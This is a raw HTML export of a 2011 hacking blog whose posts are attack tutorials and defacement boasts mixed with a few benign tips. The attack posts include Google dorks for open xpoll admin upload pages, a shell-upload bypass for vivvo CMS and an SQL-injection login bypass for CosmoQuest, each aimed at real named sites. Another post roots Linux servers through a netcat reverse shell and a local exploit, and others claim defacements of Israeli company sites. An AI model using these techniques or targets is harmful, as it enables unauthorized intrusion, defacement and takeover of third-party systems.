border-top-color: rgb(227, 226, 226); border-right-color: rgb(227, 226, 226); border-bottom-color: rgb(227, 226, 226); border-left-color: rgb(227, 226, 226); background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(255, 255, 255); margin-top: 0px; margin-right: 4px; margin-bottom: 4px; margin-left: 0px; border-width: initial; border-color: initial; background-position: initial initial; background-repeat: initial initial; " /></a></div>
<br />
<br />Within minutes of intallation of this small honeypot i got the scanning alert sound, when checked these were the UDP packets mainly left over the internet for scanning of hosts........</div></div></div></span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-21443993976526644362011-08-28T02:12:00.000-07:002011-08-28T02:22:03.806-07:00Hack Website Through Exploit of Xpoll Admin<div><span class="Apple-style-span">Frist of all open </span></div><div><span class="Apple-style-span">
<br /></span></div><div><span class="Apple-style-span">Http:// Google.com</span></div><div>
<br /></div><div><span class="Apple-style-span">Then type xpoll admin </span></div><div><span class="Apple-style-span">in a seacrh bar </span></div><div><span class="Apple-style-span">
<br /></span></div><div><span class="Apple-style-span">After hit you will be see many sites which are search by google </span></div><div><span class="Apple-style-span">now open sites you will be get open admin image upload area where you can upload your </span></div><div><span class="Apple-style-span">Deface page / shell / or you can load your image to </span></div><div><span class="Apple-style-span">
<br /></span></div><div><span class="Apple-style-span">Once you upload your Deface page </span></div><div><span class="Apple-style-span">than remove /admin from URL and after images/ type your deface page name like hitcher101.html in my case </span></div><div>
<br /></div><div><span class="Apple-style-span">Demo </span></div><div><a href="http://www.rasanet.com/fa/xpoll/admin/images/index.php">http://www.rasanet.com/fa/xpoll/admin/images/index.php</a></div><div><a href="http://www.rasanet.com/fa/xpoll/images/hitcher101.html">http://www.rasanet.com/fa/xpoll/images/hitcher101.html</a></div><div><a href="http://legend-h.org/mirror/211956/rasanet.com/fa/xpoll/images/hitcher101.html">http://legend-h.org/mirror/211956/rasanet.com/fa/xpoll/images/hitcher101.html</a></div><div>
<br /></div><div><span class="Apple-style-span">Enjoy it </span></div><div>
<br /></div><div>
<br /></div><div>
<br /></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-32462053979162916992011-08-20T01:20:00.000-07:002011-08-20T01:26:08.132-07:00Save your Facebook account from Malicious script scam<span class="Apple-style-span" style="color: rgb(51, 51, 51); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 16px; background-color: rgb(255, 255, 255); "><div>First of all What is a malicious script scam >?</div><div>
<br /></div>In a <b>malicious script scam</b> you are asked to copy and paste text into your browser’s address bar in order to see something interesting or surprising for example who viewed your profile
<br />
<br /><img src="https://fbcdn-sphotos-a.akamaihd.net/hphotos-ak-ash4/230729_10150184586289887_119341934886_6667693_4831432_n.jpg" style="border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; " />
<br />This "code" is actually a malicious script. Instead of showing you what was advertised, it uses your account to create events and pages and send your friends spam.
<br /></span><div><span class="Apple-style-span" style="color: rgb(51, 51, 51); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 16px; background-color: rgb(255, 255, 255); ">
<br /></span></div><div><span class="Apple-style-span" style="color: rgb(51, 51, 51); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 16px; background-color: rgb(255, 255, 255); "><b>Stay Safe </b>
<br />
<br />Spammers often advertise surprising things like (ex: the opportunity to see who viewed your profile) to try to lure people into their spam traps.<ul class="uiList uiListBulleted" style="list-style-type: square; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 12px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; color: rgb(59, 89, 152); "><li class="uiListVerticalItemBorder" style="border-top-width: 1px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; "><div class="fcb" style="color: rgb(51, 51, 51); ">Never click on suspicious links, even if they’re sent by your friends.</div></li><li class="uiListVerticalItemBorder" style="border-top-width: 1px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; "><div class="fcb" style="color: rgb(51, 51, 51); ">Never copy and paste text into your internet browser address bar if you are unsure of what it is.</div><div class="fcb" style="color: rgb(51, 51, 51); ">Learn more about<a href="http://hitcher-hackyou.blogspot.com/"> <span class="Apple-style-span" ><span class="Apple-style-span" style="cursor: pointer;"><u>keeping your account secure</u></span></span>.</a></div></li></ul></span></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-49308739066183013752011-08-11T11:39:00.000-07:002011-08-11T11:44:55.492-07:00Ntkod company___and___Capital DGR Company LTD Of Israel is Hacked By Hitcher<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgayQeBw2VKGxOqFpD8r56jpQ-sxFrHOThVRIYNYOCcXgC02pdl81XNUTemP-XqPoM4gUlXiD0GNSkSu0r5b4gI0MzzSZL84geKDyEnmlEgpsT1pctN_xZZ9_fgCiRVjXvB3tgdw25FO5xh/s1600/NEWHACK.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 200px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgayQeBw2VKGxOqFpD8r56jpQ-sxFrHOThVRIYNYOCcXgC02pdl81XNUTemP-XqPoM4gUlXiD0GNSkSu0r5b4gI0MzzSZL84geKDyEnmlEgpsT1pctN_xZZ9_fgCiRVjXvB3tgdw25FO5xh/s400/NEWHACK.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5639670593120183666" /></a><span class="Apple-style-span" style="color: rgb(51, 255, 51); ">
<br /></span><div><span class="Apple-style-span">Ntkod company one of the leading companies in the field of barcode and data collection in the Israel</span>
<br /><div>
<br /></div><div>
<br /></div><div><a href="http://www.netcode.co.il/pcf.html">http://www.netcode.co.il/pcf.html</a></div><div><a href="http://k0-ka.in/attack/?id=32308">http://k0-ka.in/attack/?id=32308</a></div><div><a href="http://legend-h.org/mirror/204719/ne...co.il/pcf.html">http://legend-h.org/mirror/204719/ne...co.il/pcf.html</a></div><div>
<br /></div><div>
<br /></div><div><span class="Apple-style-span">Capital DGR Company LTD Of Israel </span></div><div>
<br /></div><div><a href="http://www.dgr.co.il/pcf.html">http://www.dgr.co.il/pcf.html</a></div><div><a href="http://k0-ka.in/attack/?id=32309">http://k0-ka.in/attack/?id=32309</a></div></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-54445995286385092642011-07-28T03:43:00.000-07:002011-07-28T04:03:41.970-07:00How To Get Back The Old Facebook Chat Box<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7oVsAXJIOc7kec5mUsYkIU0Y3lDmVU4x2oSzBQ7g_rf0dL_WQEH5SEaXqn0497jNMmguM9_WkzKEsNPAJPRcuamgMsjWmgbI8piFzMEX4cxZDFv-fyEI9uPG1mXw_wkGt7RahhG-ojblP/s1600/fbchat.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 400px; height: 298px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7oVsAXJIOc7kec5mUsYkIU0Y3lDmVU4x2oSzBQ7g_rf0dL_WQEH5SEaXqn0497jNMmguM9_WkzKEsNPAJPRcuamgMsjWmgbI8piFzMEX4cxZDFv-fyEI9uPG1mXw_wkGt7RahhG-ojblP/s400/fbchat.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5634355875446917042" /></a><br /><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /><span class="Apple-style-span">The Trick I will be tell you will be work On <span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 20px; ">Firefox and Chrome </span></span><div><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 20px; ">If you are using Chrome than you don't need of download </span><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 20px; ">Greasemonkey addon but if you are using Firefox than with out Greasemonkey addon this Script will not be run</span></div><div><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 20px; "><br /></span></div><div><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 20px; "><span class="Apple-style-span">First step Download Greasemonkey for Mozilla Firefox over </span><span class="Apple-style-span"><a alt="Install" href="https://addons.mozilla.org/firefox/downloads/latest/748/addon-748-latest.xpi?src=addondetail" target="_blank" title="Install" style="text-decoration: underline; outline-style: none; outline-width: initial; outline-color: initial; ">here</a>.</span></span><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 20px; "> Install it. This is only for Firefox, if you’re on Chrome then start with the second step skip the first step </span></div><div><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 20px; "><br /></span></div><div><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', Times, serif; line-height: 22px; "><span class="Apple-style-span">Second step now you need to download a userscript known as Facebook Sidebar Chat Reversion on both Chrome and Firefox. Get it from </span><span class="Apple-style-span"><a alt="Install" href="http://userscripts.org/scripts/source/107159.user.js" target="_blank" title="Install" style="text-decoration: underline; outline-style: none; outline-width: initial; outline-color: initial; ">here</a>.</span></span></div><div><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', Times, serif; line-height: 22px; "><span class="Apple-style-span"><br /></span></span></div><div><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', Times, serif; line-height: 22px; "><span class="Apple-style-span">Enjoy the old Facebook chat box</span></span></div><div><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', Times, serif; line-height: 22px; "><span class="Apple-style-span"><br /></span></span></div><div><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 22px; ">Regards</span></span><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', Times, serif; line-height: 22px; "><span class="Apple-style-span"> <span class="Apple-style-span">Hitcher </span> </span></span></div><div><span class="Apple-style-span" style="color: rgb(117, 116, 116); font-family: Georgia, 'Times New Roman', Times, serif; line-height: 22px; "><br /></span></div><div><span class="Apple-style-span" style="color: rgb(117, 116, 116); font-family: Georgia, 'Times New Roman', Times, serif; font-size: 12px; line-height: 22px; "><br /></span></div></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-26757982291377933292011-07-21T06:13:00.000-07:002011-07-21T06:18:49.417-07:00Rooting a Linux Servers<span class="Apple-style-span" style="font-family: sans-serif; font-size: 13px; line-height: 18px; ">Post Author Is </span><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 18px;"><b><br /></b></span></span><span class="Apple-style-span" style="font-family: sans-serif; font-size: 13px; line-height: 18px; "><span class="largetext" style="font-size: 16px; "><span class="Apple-style-span" style="outline-style: none; outline-width: initial; outline-color: initial; -webkit-background-clip: padding-box; text-decoration: none; "><b><span class="Apple-style-span" style="outline-width: initial; outline-color: initial; -webkit-background-clip: padding-box;">ch3</span>_hacker </b></span></span></span><span class="Apple-style-span" style="font-family: sans-serif; font-size: 13px; line-height: 18px; "><div><br /></div></span><span class="Apple-style-span" style="font-family: sans-serif; font-size: 13px; line-height: 18px; "><div><span class="Apple-style-span" style="font-family: sans-serif; font-size: 13px; line-height: 18px; "><br /></span></div><div><span class="Apple-style-span" style="font-family: sans-serif; font-size: 13px; line-height: 18px; "><br /></span></div>First of all to be locked in by SSH shell should connect us with netcat which can be downloaded here<br />Put netcat to the desktop and go to cmd<br /><br /><div class="codeblock" style="background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(255, 255, 255); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-bottom-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); padding-top: 4px; padding-right: 4px; padding-bottom: 4px; padding-left: 4px; background-position: initial initial; background-repeat: initial initial; "><div class="title" style="border-bottom-width: 1px; border-bottom-style: solid; border-bottom-color: rgb(204, 204, 204); font-weight: bold; margin-top: 4px; margin-right: 0px; margin-bottom: 4px; margin-left: 0px; ">Code:<br /></div><div class="body" dir="ltr"><code style="overflow-x: auto; overflow-y: auto; height: auto; max-height: 200px; display: block; font-family: Monaco, Consolas, Courier, monospace; font-size: 13px; ">cd Desktop<br />nc -lvp 1337</code></div></div>1337 = Port for netcat<br /><br /><img src="http://i.imgur.com/8M3cD.png" border="0" alt="[Image: 8M3cD.png]" style="border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; " /><br /><br />Now we need to connect to IP Sound from the shell, shell must have back-Connect tool as follows:<br /><br /><img src="http://i.imgur.com/MwXGv.png" border="0" alt="[Image: MwXGv.png]" style="border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; " /><br /><br />If everything has succeeded so far are associated with success in SSH Mode:<br /><br />Now to obtain Root Access, we have adapted to exploit the server - You can also find in google<br />Now upload exploit:<br /><br /><img src="http://i.imgur.com/lqsPx.png" border="0" alt="[Image: lqsPx.png]" style="border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; " /><br /><br />After you have uploaded execute these commands:<br /><div class="codeblock" style="background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(255, 255, 255); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-bottom-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); padding-top: 4px; padding-right: 4px; padding-bottom: 4px; padding-left: 4px; background-position: initial initial; background-repeat: initial initial; "><div class="title" style="border-bottom-width: 1px; border-bottom-style: solid; border-bottom-color: rgb(204, 204, 204); font-weight: bold; margin-top: 4px; margin-right: 0px; margin-bottom: 4px; margin-left: 0px; ">Code:<br /></div><div class="body" dir="ltr"><code style="overflow-x: auto; overflow-y: auto; height: auto; max-height: 200px; display: block; font-family: Monaco, Consolas, Courier, monospace; font-size: 13px; ">chmod 777 1<br />./1</code></div></div><br />1 (is exploit) - chmod 777 (Provision of access to file) -. / (Execution exploit)<br /><br /><img src="http://i.imgur.com/77pbG.png" border="0" alt="[Image: 77pbG.png]" style="border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; " /><br /><br />Now the server has become full root access<br />You can change password with passwd command and connect to Putty.</span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-74273688966583494452011-07-15T05:40:00.000-07:002011-07-15T05:44:43.272-07:00XSS Attack on Delhi Chamber Of Commerce by Hitcher<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRVi-su-Vtyj44HXfki2sm0lOpyxkRJjNxjv2LmiwOJClhCHVTNtS1ZAKL5znokHnD4nExchuWZ0PUhWyOJ1e_0ib2OZvfS1XO0HdJtCPy0PdDKE9Z8rkYQy0tEKNk8z0mCSMC3RIwnnbp/s1600/Delhi+Chamber+OF+Commerce.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 400px; height: 291px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRVi-su-Vtyj44HXfki2sm0lOpyxkRJjNxjv2LmiwOJClhCHVTNtS1ZAKL5znokHnD4nExchuWZ0PUhWyOJ1e_0ib2OZvfS1XO0HdJtCPy0PdDKE9Z8rkYQy0tEKNk8z0mCSMC3RIwnnbp/s400/Delhi+Chamber+OF+Commerce.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5629558988889009714" /></a><br /><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; ">XSS Attack on Delhi Chamber Of Commerce by Hitcher</span><div><span class="Apple-style-span" ><span class="Apple-style-span" style="border-collapse: collapse;"><br /></span></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; ">Vulnerable link address <a href="http://bit.ly/nEzqPb" target="_blank" style="color: rgb(0, 84, 136); ">http://bit.ly/nEzqPb</a></span></div></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-67045287793967999672011-07-11T13:20:00.000-07:002011-07-11T13:23:37.270-07:00vivvo CMS File Upload Vulnerability<span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; ">< ------------------- header data start ------------------- > </span><div><span class="Apple-style-span" ><span class="Apple-style-span" style="font-size: 12px;"><br /></span></span></div><div><span class="Apple-style-span" ><span class="Apple-style-span" style="font-size: 12px;"><br /></span></span><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; ">Application Name : vivvo CMS </span></div><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; ">Vulnerable Type : FileUpload </span></div><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; ">Infection : We can upload the shell. </span></div><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; ">author : hitcher </span></div><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; ">Demo : http://demo.myvivvo.com </span></div><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; "> </span></div><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; ">Login to Administrator Panel and go to : http://demo.myvivvo.com/admin/assets.php Click File Uploads </span></div><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; ">» After, your shell must be (*.jpg), you can rename your shell (*shell.php;gif) Upload. Shell Uploaded. </span></div><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; "><span><br /><br /></span></span></div></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-62993717342936204262011-07-10T02:40:00.000-07:002011-07-10T03:00:36.806-07:00Vulnerability CosmoQuest bypass the login page<span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "><b><span class="Apple-style-span">CosmoQuest Vulnerability founded<br /></span></b></span><div><span class="Apple-style-span" style="font-size: 12px;"><b><br /></b></span></div><div><span class="Apple-style-span" style="font-size: 12px;"><b>" TUTOR Hitcher "</b></span></div><div><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: 12px;"><b> </b></span><span class="Apple-style-span" style="font-size: 12px; "><b><br /></b></span></span></div><div><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; "><span>Bypass the login page Google dot :</span></span><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; ">"Powered By CosmoQuest"</span></div><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; "><span>and the Exploit to use is </span></span><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; ">/AdminLogin.asp</span></div><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; "><span>example ::site.com/AdminLogin.asp use to bypass input </span></span></div><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; "><span><br /></span></span></div><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; "><span>user: 'or''='</span></span></div><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; "><span>password: </span></span><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; ">'or''=''</span></div><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; "><br /></span></div><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; ">try on this site </span><a href="http://www.amskrupajal.org/">http://www.amskrupajal.org</a></div></div><div><br /></div><div>Enjoy it </div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-55836780771278340202011-07-08T02:40:00.000-07:002011-07-08T02:44:11.380-07:00Use USB to Lock Your Computer<span class="Apple-style-span" style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; ">1. Download predator software by clicking <span style="color: rgb(0, 0, 0); text-decoration: underline; outline-style: none; outline-width: initial; outline-color: initial; font-weight: bold; "><a href="http://www.montpellier-informatique.com/predator/en/index.php?n=Main.HomePage">here </a></span><br /><br />2. Predator will get launched automatically after completing installation if not you can run it from <span style="font-weight: bold; ">Start/Programs/Predator</span><br /><br />3. Now Insert your Usb. You will get a message to define your new password (This process will not format your pendrive and your pendrive data will not be affected by this at all)<br /><br /><img alt="" border="0" id="BLOGGER_PHOTO_ID_5606623741147034930" src="http://2.bp.blogspot.com/-ILau_fCZBWw/Tc66lmBXNTI/AAAAAAAAFOs/77YDthATMsM/s400/predator_lock%2B1.JPG" style="max-width: 99%; padding-top: 6px; padding-right: 6px; padding-bottom: 6px; padding-left: 6px; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(255, 255, 255); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(228, 226, 226); border-right-color: rgb(228, 226, 226); border-bottom-color: rgb(228, 226, 226); border-left-color: rgb(228, 226, 226); margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; display: block; height: 171px; text-align: center; width: 322px; background-position: initial initial; background-repeat: initial initial; " /><br /><br />4. Click on Ok and Enter your your new password in next dialog box.<br /><br />5. Check that the drive letter displayed under “USB key drive” actually matches your flash drive or choose the correct letter from the dropdown list<br /><br />6. Finally click on <span style="font-weight: bold; ">Create Key</span> button and then on <span style="font-weight: bold; ">OK</span> button<br /><br /><img alt="" border="0" id="BLOGGER_PHOTO_ID_5606624315526696642" src="http://2.bp.blogspot.com/-Gy6nEncd6B0/Tc67HBwJTsI/AAAAAAAAFO0/guEBvv-oY98/s400/predator_lock%2B2.JPG" style="max-width: 99%; padding-top: 6px; padding-right: 6px; padding-bottom: 6px; padding-left: 6px; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(255, 255, 255); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(228, 226, 226); border-right-color: rgb(228, 226, 226); border-bottom-color: rgb(228, 226, 226); border-left-color: rgb(228, 226, 226); margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; display: block; height: 358px; text-align: center; width: 400px; background-position: initial initial; background-repeat: initial initial; " /><br /><br />After this the software will automatically exit.Now restart the program by clicking the icon on desktop.<br /><br />Predator will take few seconds for initialization. Once the icon in the taskbar turns green then your software has initialized itself.</span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-40226051963687670942011-07-03T10:08:00.000-07:002011-07-03T10:20:12.380-07:00How to know that web server is Windows or Linux Based<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2TKWpCO-ogPNmmDGprhQqFYAoZ9hn8XsdBVDVzz7K2t3fjLpggXtyqZnsRzXUTf7EikU2SGhggKpaOPOfZsFsPWM8KjuUXB9c9CQarknXXkVsvH5f6bUgJpUavo7NaqyhHm_lYAferk1D/s1600/ping.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 400px; height: 204px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2TKWpCO-ogPNmmDGprhQqFYAoZ9hn8XsdBVDVzz7K2t3fjLpggXtyqZnsRzXUTf7EikU2SGhggKpaOPOfZsFsPWM8KjuUXB9c9CQarknXXkVsvH5f6bUgJpUavo7NaqyhHm_lYAferk1D/s400/ping.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5625175341731885122" /></a><br /><div><br /></div><div><br /></div><div><span class="Apple-style-span" style="color: rgb(0, 0, 0); -webkit-text-decorations-in-effect: none; "><span class="Apple-style-span"><i style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><i><br /></i></i></span></span></div><div><span class="Apple-style-span" style="color: rgb(0, 0, 0); -webkit-text-decorations-in-effect: none; "><span class="Apple-style-span"><i style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><i><br /></i></i></span></span></div><div><span class="Apple-style-span" style="color: rgb(0, 0, 0); -webkit-text-decorations-in-effect: none; "><span class="Apple-style-span"><i style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><i><br /></i></i></span></span></div><div><span class="Apple-style-span" style="color: rgb(0, 0, 0); -webkit-text-decorations-in-effect: none; "><span class="Apple-style-span"><i style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><i><br /></i></i></span></span></div><div><span class="Apple-style-span" style="color: rgb(0, 0, 0); -webkit-text-decorations-in-effect: none; "><span class="Apple-style-span"><i style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><i><br /></i></i></span></span></div><div><span class="Apple-style-span" style="color: rgb(0, 0, 0); -webkit-text-decorations-in-effect: none; "><span class="Apple-style-span"><i style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><i><br /></i></i></span></span></div><div><span class="Apple-style-span" style="color: rgb(0, 0, 0); -webkit-text-decorations-in-effect: none; "><span class="Apple-style-span"><i style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><i><br /></i></i></span></span></div><div><span class="Apple-style-span" style="color: rgb(0, 0, 0); -webkit-text-decorations-in-effect: none; "><span class="Apple-style-span"><i style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><i><br /></i></i></span></span></div><div><span class="Apple-style-span" style="color: rgb(0, 0, 0); -webkit-text-decorations-in-effect: none; "><span class="Apple-style-span"><i style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; "><i><b><a 